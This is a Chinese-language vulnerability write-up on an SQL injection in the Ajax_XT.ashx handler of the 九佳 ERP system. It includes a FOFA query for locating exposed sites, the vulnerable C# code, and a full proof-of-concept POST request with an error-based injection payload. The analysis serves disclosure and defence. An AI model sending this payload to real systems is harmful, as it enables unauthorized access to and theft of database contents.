漏洞简介
九佳易管理系统中的 Ajax_XT.ashx 通用处理程序接口存在SQL注入漏洞,该接口主要用于处理前端 AJAX 请求并与后端数据库进行交互。由于接口未对客户端传入的关键参数进行严格的输入校验、参数化处理或特殊字符转义,攻击者可通过构造恶意的 SQL 语句片段注入到请求参数中,使后端数据库执行非授权的 SQL 操作,进而窃取、篡改甚至销毁数据库中的敏感数据。
影响版本
fofa语法
title="VSQL" && body="/Scripts/Login_A8/"
漏洞分析
根据 Service/Ajax_XT.ashx 的代码引用
<%@ WebHandler Language="C#" CodeBehind="Ajax_XT.cs" Class="A8ERP.Ajax_XT" %>
找到 Ajax_XT 相关类的实现逻辑
public class Ajax_XT : IHttpHandler, IRequiresSessionState
{
public void ProcessRequest(HttpContext context)
{
context.Response.ContentType = "text/plain";
string str1 = context.Request["curFlag"].ToString();
string str2;
object obj1;
string str3;
string str4;
string str5;
if ("XT_YJCD_SAVE".Equals(str1)){......}
......
else if ("PicSord".Equals(str1))
{
DBHelp dbHelp = new DBHelp();
dbHelp.Open();
string str30 = context.Request["curSpkh"].ToString().Trim();
string[] strArray = context.Request["curPxbh"].ToString().Trim().Split(new char[1]
{
','
});
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < strArray.Length; ++index)
stringBuilder.Append($"update da_sp_pic set pxxh='{(object) (index + 1)}' where spkh='{str30}' and sortid='{strArray[index]}';");
SqlCommand command = dbHelp.GetCommand(stringBuilder.ToString());
obj1 = (object) 0;

其中绝大部分都是参数绑定的方式进行传参处理,不存在SQL注入漏洞,少部分是直接参数拼接,如当curFlag=PicSord时,参数curSpkh==>str30 以及 curPxbh 被直接拼接进$"update da_sp_pic set pxxh='{(object) (index + 1)}' where spkh='{str30}' and sortid='{strArray[index]}';"sql语句中,无任何过滤或校验就直接执行,从而造成SQL注入漏洞。
漏洞复现
因为参数获取是通过
this.Request["hyh"]的方式,因此支持get、post等常规方式外,还支持multipart格式
POST /Service/Ajax_XT.ashx HTTP/1.1
Host: a8erp.mrxn.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="curFlag"
PicSord
------WebKitFormBoundary
Content-Disposition: form-data; name="curPxbh"
1,2
------WebKitFormBoundary
Content-Disposition: form-data; name="curSpkh"
'-1/user--
------WebKitFormBoundary--

成功利用报错注入在响应回显当前数据库用户信息


